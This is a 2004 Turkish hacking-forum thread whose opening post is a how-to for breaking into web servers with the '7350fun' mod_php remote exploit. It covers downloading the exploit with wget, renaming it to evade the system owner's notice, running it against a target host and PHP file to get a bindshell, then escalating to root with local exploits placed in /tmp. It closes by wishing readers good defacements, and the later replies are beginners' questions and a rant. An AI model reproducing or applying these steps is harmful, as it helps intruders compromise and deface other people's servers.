Tahribat.com Forumları
Web sitesi Güvenliği, DOS - DDOS Saldırıları...
Php 4.0.2-4.0.7 Remote Sploit By Moliver

Yazar ekselans (1) Night_Wolf (1) RhiFaT (1) sorcerer (1) zemin (1) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Php 4.0.2-4.0.7 Remote Sploit By Moliver

1. 11/Haz/04 14:43 Kısayol Şikayet Özel Mesaj
   MoLiVeR
   
   

   Kayıt Tarihi: 25/Nisan/2003
   

   biraz *nix ağırlıklı hacking için annatayım dedim ..

   
   

   Kullancağımız araçlar püsürler :

   
   

   shell account veya linux b0x

   
   

   ------------------------------

   
   

   shellimze yada b0xımızla ilk login oluyoruz daha sonra

   
   

   wget http://www.packetstormsecurity.org/removed/7350fun

   
   

   eğer shell kullnıyorsanız root çakmasın diye mv 7350fun ttx yada farklı bir dosya ismine çevirin sadece bir önlem tabi

   
   

   daha sonra chmod +x ttx neden böle yaptık binary file bu gerekli chmodu verdik çalışsın diye ...

   
   

   ./ttx deyince sploitniiz çalışır

   
   

   ver karşınıza sploitin konsolu çıkar :

   
   

   7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
   by lorian.

   
   

   usage: ./ttx [options] <hostname> <phpfile>

   
   

   Options:
     -c            check exploitability only, do not exploit
     -n            no check mode
     -s start      bruteforce start (top)
     -t target     choose target
                   (1) PHP v4.0.2rc1-v4.0.5
                   (2) PHP v4.0.6-v4.0.7RC2
   ./ttx -t target host  /php dosyasi

   
   

   şimdi target ksımıına php versionuna göre 1 veya 2 diyoruz

   
   

   daha sonra hostu yazıyoruz ve php dosyasının yerini belirtiyoruz

   
   

   örn :

   
   

   ./ttx -t 1 www.ornek.com /forum/index.php

   
   

   gibi yapıyorux sonra okeyliyoruz [bfffad3] ++++ gibi tarmaya başlar biraz uzun sürer bu bekliceksiniz daha sonra işlem bitince

   
   

   komut satırı

   
   

   kısmı gelcek bi dir yada ls -al çekerseniz dosyaları listelicek size bindshell dediğimiz olayı hazırlamış oluyor ...

   
   

   daha sonra idnizi 0 yapmak lazım root yetkisi yani bir local sploit bulun genellikle bu tip sistemlere girerseniz eski olur o yüzden ptrace-kmod hatarihanzo gibi sploitler root almak için yeterli olur ..

   
   

   local exploiterliniz tmp içine atın çünkü yazıdrma yetkisi bi orda var

   
   

   eğre dosyayaı çekerken wget yemesse ftp ile çekin olda olmassa lynx -dump file diye çekin oda olmassa kodu alınnn pico amele diye kaydedin

   
   

   biraz linux bilginiz olursa zaten annarsınız...

   
   

   kolay gelsin ii defaceler ..

   
   

                    ----------------- Powered BY CTR TEAM -------------------

   
   

                                                      Yazan : MoLiVeR Yardımım dokunduysa ne mutlu bana

   
   

         bunu başka sitelerde kullanırken lütfen yazarın ismini felam yazın tittirmeyin belanızı :P

   
   

                              

   
   

    

   
   

    

   ---

   Ir4DeX Security Group 2007
   Alıntı yap
2. 12/Haz/04 11:21 Kısayol Şikayet Özel Mesaj
   sorcerer
   
   
   

   Kayıt Tarihi: 29/Ekim/2003
   

   Bu İş Nasıl Yapılır Anlamadım Gitti bi Türlü... Bunu  Yapınca Siten yi Hacklemiş mi oLuyoruz Nasıl oLuyor..  Biraz Daha Amatörce Anlatırmısın Biz Siz Gibi Bilmiyoz Bu işLeri Öğrenelim aqa :)

   ---

   Coco cola gibiyim hayatın tadıyım, rocco gibiyim çok şekerim, albeniyim bahanem çok, çikolatalı gofretim beni sevmeyen yok!...
   Alıntı yap
3. 30/Eyl/04 06:41 Kısayol Şikayet Özel Mesaj
   RhiFaT
   
   

   Kayıt Tarihi: 11/Mart/2004
   

   arkadaş bu php sürümleri için exploit bununla sistem de  root oluyosun

   ---

   işte öyle
   Alıntı yap
4. 30/Eyl/04 13:58 Kısayol Şikayet Özel Mesaj
   zemin
   
   

   Kayıt Tarihi: 02/Kasım/2003
   

   Güzel anlatmış arkadaş zaten...
   Alıntı yap
5. 01/Eki/04 12:16 Kısayol Şikayet Özel Mesaj
   Night_Wolf
   
   

   Kayıt Tarihi: 01/Ekim/2004
   

   bindshell olayı ne demek?

   ---

   May the force be with you!!
   Alıntı yap
6. 31/Tem/05 17:18 Kısayol Şikayet Özel Mesaj
   ekselans
   
   

   Kayıt Tarihi: 31/Temmuz/2005
   

   ya dostum çok sazansınız yaw yk sade dille anlat falan demeyin bu adamlar zaten bilseler kendileri yaparlar bir ikinciside kendi bilmiyor ki basitini gidiyor başak siteden kopyala yapıştır yapıyor sonra buraya getirip ahkam kesiyor soru sorsan bilemez eminm yarın sölim der araştırı falan sonra tekrar kopyala yapıştır sana yollar ben tanımam bunları benim evimde 4 yıldır internet var anlata biliyor muyum zaten bu işi bilen adamınburda ne işi var değil mi?

   
   

   sen bilseydin burda olur muydun kekır değil de hacker olsaydın  site güzel adamlar güzel yre değin miş ce ekmeklerini yiyorlar ve o yüzden hacker belki nlar olabilir ama ötekiler asla olmazlar zaten yok şu programı kullan yok bunu kullan fallan adları nerden ezberliyorlarsa artık işte kendilerini eolarını tatmin ediyorlsar bu şekilde hack dediğin adm zaten kendi yazar kendi yapar boş verin siz bunları program simi ezberleyeceğine biraz dil örenseniz belki bir şeyler yapatsınız benden tavsiye bu tüe adamalra da nasıl yapıyorsunuz demekten vazgeçin salak durumuna düşürmeyin kendinizi işte ben burdayım madem öle hacklesinler benide görem adminler hariç onlar yapabilirler birşey demem neyse hade bakam....kendinize ii bakın güzel bir site güzel bilgile vriyor herkesin emeğine tşkler sağlıcakla kalın!!!!!!!!!

   ---

   [url=www.nevruzbaba.com][img]http://img467.imageshack.us/img467/5941/nevruzbaba4hw.jpg[/img][/url] [size=18][color=darkred]Nevruzbaba.com Dünya Türk Kulübü Açıldı[/color][/size]VATAN:::::......________________www.nevruzbaba.com
   Alıntı yap

Cevapla